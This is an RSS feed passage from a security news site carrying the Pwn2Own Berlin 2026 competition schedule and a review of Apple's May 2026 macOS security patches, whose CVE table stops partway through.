<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=updateapple+behebt+absturzproblem+safari%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 01:16:05 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 01:16:05 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=updateapple+behebt+absturzproblem+safari%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=updateapple+behebt+absturzproblem+safari%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Pwn2Own Berlin 2026: The Full Schedule]]></title>
<description><![CDATA[Willkommen! (Welcome!) Pwn2Own Berlin 2026 has arrived at OffensiveCon, and the world’s top security researchers are ready. This year’s enterprise-focused competition features AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products.Earlier today, we held the ran...]]></description>
<link>https://tsecurity.de/de/3694567/hacking/pwn2own-berlin-2026-the-full-schedule/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694567/hacking/pwn2own-berlin-2026-the-full-schedule/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Willkommen! (Welcome!) Pwn2Own Berlin 2026 has arrived at OffensiveCon, and the world’s top security researchers are ready. This year’s enterprise-focused competition features AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products.</p><p class="">Earlier today, we held the random draw to determine attempt order. Below is the official schedule. All times are Berlin local time (CET) and may change as the competition progresses. Check back for live updates.</p><p class="">In case you missed it, you can watch the draw <a href="https://youtube.com/live/Dtp-ICE0crw" target="_blank">here</a>. </p>





















  
  




  


  
  
    
    
      
        
        
        
          
          
            
        
        
          
        
        
            
          
        
        
      
    
  
  
    



  



  

<p>Jump to: 
<a data-preserve-html-node="true" name="top"></a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day1" tabindex="0">Day One</a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day2" tabindex="0">Day Two</a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day3" tabindex="0">Day Three</a></p>
<p><a data-preserve-html-node="true" name="day1"></a></p>




  <p class="">DAY ONE</p><p class=""><strong>Thursday, May 14 - 1030</strong></p><p class="">chompie of IBM X-Force Offensive Research (XOR) targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Le Duc Anh Vu ( @vulda ) of Viettel Cyber Security (@vcslab) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Orange Tsai (@orange_8361) of DEVCORE Research Team (@d3vc0r3) targeting Microsoft Edge – Sandbox Escape in the Web Browser category for a total of $175,000 and 17.5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1130</strong></p><p class="">k3vg3n targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1300</strong></p><p class="">Angelboy (@scwuaptx) of DEVCORE Research Team and TwinkleStar03 (@_twinklestar03), working with DEVCORE Internship Program targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Park Jae Min (@hiariz) targeting Oracle Autonomous AI Database in the AI Database category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1400</strong></p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points.</p><p class="">Yoseop kim(@pwning_me) targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1500</strong> </p><p class="">Ben Koo (@kiddo_pwn) of Team DDOS targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Interrupt Labs targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1530</strong></p><p class="">maitai (@MaitaiThe) of Doyensec (@Doyensec) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1600</strong></p><p class="">Billy (@st424204), Pan Zhenpeng(@Peterpan980927), Weiming Shi (@bestswngs) of STARLabs SG (@starlabs_sg) targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Marcin Wiązowski targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1630</strong></p><p class="">haehae (@haehaeYang) of Out Of Bounds targeting Chroma in the AI Database category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1730</strong></p><p class="">chompie of IBM X-Force Offensive Research (XOR) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Yoseop Kim(@pwning_me) targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1800</strong></p><p class="">@rewhiles of Viettel Cyber Security (@vcslab) targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1830</strong></p><p class="">Kentaro Kawane of GMO Cybersecurity by Ierae targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Qrious Secure (@qriousec) targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1900</strong></p><p class="">haehae (@haehaeYang) of Out of Bounds targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p>





















  
  



<p><a data-preserve-html-node="true" name="day2"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class="">DAY TWO</p><p class=""><strong>Friday, May 15 - 1030</strong></p><p class="">Ben Koo (@kiddo_pwn) of Team DDOS targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Stephen Fewer (Rapid7) targeting Microsoft SharePoint in the Server category for a total of $100,000 and 10 Master of Pwn points</p><p class="">Tao Yan (@Ga1ois) and Edouard Bochin (@le_douds) from Palo Alto Networks targeting Apple Safari – Renderer Only in the Web Browser category for a total of $75,000 and 7.5 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1130</strong></p><p class="">Le Duc Anh Vu ( @vulda ) of Viettel Cyber Security (@vcslab) targeting Cursor in the Coding Agent category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Nikolaos Mourousias (@deltaclock), Caue Obici (@caueobici) and Bruno Halltari (@BrunoModificato) of OtterSec targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1300</strong></p><p class="">Ruitong from the Abstract Team at the University of Colorado Boulder targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1330</strong></p><p class="">Kiyong Kwak of Kakaogames and Song Nuri of Samsung Electronics targeting Apple Safari – Renderer Only in the Web Browser category for a total of $75,000 and 7.5 Master of Pwn points</p><p class="">Orange Tsai (@orange_8361) of DEVCORE Research Team targeting Microsoft Exchange in the Server category for a total of $200,000 and 20 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1400</strong></p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1430</strong></p><p class="">Billy (@st424204), Bruce Chen(@bruce30262), Pan Zhenpeng(@Peterpan980927), Weiming Shi (@bestswngs ) of STARLabs SG (@starlabs_sg) targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class="">David Tae, Louis Hur of Out Of Bounds targeting Ollama in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1530</strong></p><p class="">Team: Alon Ben Tsur (@iamgweej), Yahav Azran (@_yahav) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1600</strong></p><p class="">@rewhiles of Viettel Cyber Security (@vcslab) targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Siyeon Wi targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1630</strong></p><p class="">Byung Young Yi (@yibarrack) of Out Of Bounds targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1700</strong></p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting Cursor in the Coding Agent category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1800</strong></p><p class="">Daniel Cohen Hillel (@0xDACA) targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p>





















  
  



<p><a data-preserve-html-node="true" name="day3"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class="">DAY THREE</p><p class=""><strong>Saturday, May 16 - 1100</strong></p><p class="">Le Tran Hai Tung (@tacbliw), dungnm (@dungnm_) and hieuvd (@gr4ss341) of Viettel Cyber Security (@vcslab) targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1330</strong></p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Hyunwoo Kim (@v4bel) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Team: Giuseppe Calì (@_gcali) of Summoning Team targeting VMware ESXi in the Virtualization category with the Cross-tenant Code Execution Addon add-on for a total of $200,000 and 20 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1430</strong></p><p class="">splitline (@_splitline_) of DEVCORE Research Team targeting Microsoft SharePoint in the Server category for a total of $100,000 and 10 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1600</strong></p><p class="">Byung Young Yi (@yibarrack) of Out Of Bounds targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Nguyen Hoang Thach (@hi_im_d4rkn3ss) of STARLabs SG (@starlabs_sg) targeting VMware ESXi in the Virtualization category with the Cross-tenant Code Execution Addon add-on for a total of $200,000 and 20 Master of Pwn points</p><p class="">Follow the action live! We’ll be posting real-time updates and results throughout the competition on our <a href="https://www.zerodayinitiative.com/blog">blog</a> and across social media. Stay up to date by following us on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, and <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a>, and join the conversation using #Pwn2Own Berlin and #P2OBerlin for continuous coverage. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Apple macOS Security Update Review]]></title>
<description><![CDATA[We’ve received some feedback from those who read the Patch Blog that they would like something similar for macOS updates. Unfortunately, Apple doesn’t schedule these for a particular day, but we can provide our thoughts and analysis on the days they do release their latest patches. For May 2026, ...]]></description>
<link>https://tsecurity.de/de/3694569/hacking/the-apple-macos-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694569/hacking/the-apple-macos-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">We’ve received some feedback from those who read the Patch Blog that they would like something similar for macOS updates. Unfortunately, Apple doesn’t schedule these for a particular day, but we can provide our thoughts and analysis on the days they do release their latest patches. </p><p class="">For May 2026, Apple released 82 unique CVEs across the three macOS versions: 79 for macOS Tahoe 26.5, 45 for macOS Sequoia 15.7.7, and 42 for macOS Sonoma 14.8.7. Since Apple doesn’t provide CVSS scores or other severity information, we’re left to speculate on which of these bugs is the most severe. However, there are a couple that stand out.</p><p class="">-              <strong>CVE-2026-28819 (Wi-Fi)</strong> stands out as the strongest candidate for the most severe as it states, “An app may be able to execute arbitrary code with kernel privileges.” The combination of arbitrary code execution at the kernel level is about as bad as it gets on a severity scale. Plus, it affects all three macOS versions (Tahoe, Sequoia, and Sonoma).</p><p class="">-              <strong>CVE-2026-43668 (mDNSResponder)</strong> also piques my interest since, “A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.” The remote attack vector with kernel memory corruption on all three OS versions makes this a serious one, especially since mDNSResponder is always running.</p><p class="">-              <strong>CVE-2026-28972 (Kernel)</strong> This one states that “An app may be able to cause unexpected system termination or write kernel memory.” An out-of-bounds write directly into kernel memory on all three OS versions. This one may also have implications in the upcoming Pwn2Own Berlin contest.</p><p class="">Here’s a look at all the bugs released by Apple this month:</p>





















  
  




  


  
    


  82Unique CVEs
  <a href="https://support.apple.com/en-us/127115" target="_blank">79macOS Tahoe 26.5</a>
  <a href="https://support.apple.com/en-us/127116" target="_blank">45macOS Sequoia 15.7.7</a>
  <a href="https://support.apple.com/en-us/127117" target="_blank">42macOS Sonoma 14.8.7</a>



<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>CVE ID</th>
    <th>Component</th>
    <th>Impact</th>
    <th>macOS Tahoe 26.5</th>
    <th>macOS Sequoia 15.7.7</th>
    <th>macOS Sonoma 14.8.7</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28991" target="_blank">CVE-2026-28991</a></td>
    <td>Accelerate</td>
    <td>An app may be able to cause a denial-of-service</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28988" target="_blank">CVE-2026-28988</a></td>
    <td>Accounts</td>
    <td>An app may be able to bypass certain Privacy preferences</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28959" target="_blank">CVE-2026-28959</a></td>
    <td>APFS</td>
    <td>An app may be able to cause unexpected system termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28995" target="_blank">CVE-2026-28995</a></td>
    <td>App Intents</td>
    <td>A malicious app may be able to break out of its sandbox</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1837" target="_blank">CVE-2026-1837</a></td>
    <td>AppleJPEG</td>
    <td>Processing a maliciously crafted image may lead to a denial-of-service</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28956" target="_blank">CVE-2026-28956</a></td>
    <td>AppleJPEG</td>
    <td>Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39869" target="_blank">CVE-2026-39869</a></td>
    <td>Audio</td>
    <td>Processing an audio stream in a maliciously crafted media file may terminate the process</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28922" target="_blank">CVE-2026-28922</a></td>
    <td>CoreMedia</td>
    <td>An app may be able to access private information</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28936" target="_blank">CVE-2026-28936</a></td>
    <td>CoreServices</td>
    <td>Processing a maliciously crafted file may lead to unexpected app termination</td>
    <td>Yes</td>
    <td>No</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><img title="Reported through Zero Day Initiative" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28918" target="_blank">CVE-2026-28918</a></td>
    <td>CoreSymbolication</td>
    <td>Parsing a maliciously crafted file may lead to an unexpected app termination</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28878" target="_blank">CVE-2026-28878</a></td>
    <td>Crash Reporter</td>
    <td>An app may be able to enumerate a user's installed apps</td>
    <td>No</td>
    <td>Yes</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28915" target="_blank">CVE-2026-28915</a></td>
    <td>CUPS</td>
    <td>An app may be able to gain root privileges</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43659" target="_blank">CVE-2026-43659</a></td>
    <td>FileProvider</td>
    <td>An app may be able to access sensitive user data</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28923" target="_blank">CVE-2026-28923</a></td>
    <td>GPU Drivers</td>
    <td>A malicious app may be able to break out of its sandbox</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28925" target="_blank">CVE-2026-28925</a></td>
    <td>HFS</td>
    <td>An app may be able to cause unexpected system termination or write kernel memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-43524" target="_blank">CVE-2025-43524</a></td>
    <td>Icons</td>
    <td>An app may be able to break out of its sandbox</td>
    <td>No</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43661" target="_blank">CVE-2026-43661</a></td>
    <td>ImageIO</td>
    <td>Processing a maliciously crafted image may corrupt process memory</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28977" target="_blank">CVE-2026-28977</a></td>
    <td>ImageIO</td>
    <td>Processing a maliciously crafted file may lead to unexpected app termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28990" target="_blank">CVE-2026-28990</a></td>
    <td>ImageIO</td>
    <td>Processing a maliciously crafted image may corrupt process memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28978" target="_blank">CVE-2026-28978</a></td>
    <td>Installer</td>
    <td>A malicious app may be able to break out of its sandbox</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28992" target="_blank">CVE-2026-28992</a></td>
    <td>IOHIDFamily</td>
    <td>An attacker may be able to cause unexpected app termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28943" target="_blank">CVE-2026-28943</a></td>
    <td>IOHIDFamily</td>
    <td>An app may be able to determine kernel memory layout</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28969" target="_blank">CVE-2026-28969</a></td>
    <td>IOKit</td>
    <td>An app may be able to cause unexpected system termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43655" target="_blank">CVE-2026-43655</a></td>
    <td>IOSurfaceAccelerator</td>
    <td>An app may be able to cause unexpected system termination or read kernel memory</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43654" target="_blank">CVE-2026-43654</a></td>
    <td>Kernel</td>
    <td>An app may be able to disclose kernel memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28908" target="_blank">CVE-2026-28908</a></td>
    <td>Kernel</td>
    <td>An app may be able to modify protected parts of the file system</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28954" target="_blank">CVE-2026-28954</a></td>
    <td>Kernel</td>
    <td>A maliciously crafted disk image may bypass Gatekeeper checks</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28897" target="_blank">CVE-2026-28897</a></td>
    <td>Kernel</td>
    <td>A local user may be able to cause unexpected system termination or read kernel memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28952" target="_blank">CVE-2026-28952</a></td>
    <td>Kernel</td>
    <td>An app may be able to cause unexpected system termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28951" target="_blank">CVE-2026-28951</a></td>
    <td>Kernel</td>
    <td>An app may be able to gain root privileges</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28972" target="_blank">CVE-2026-28972</a></td>
    <td>Kernel</td>
    <td>An app may be able to cause unexpected system termination or write kernel memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28986" target="_blank">CVE-2026-28986</a></td>
    <td>Kernel</td>
    <td>An app may be able to cause unexpected system termination</td>
    <td>Yes</td>
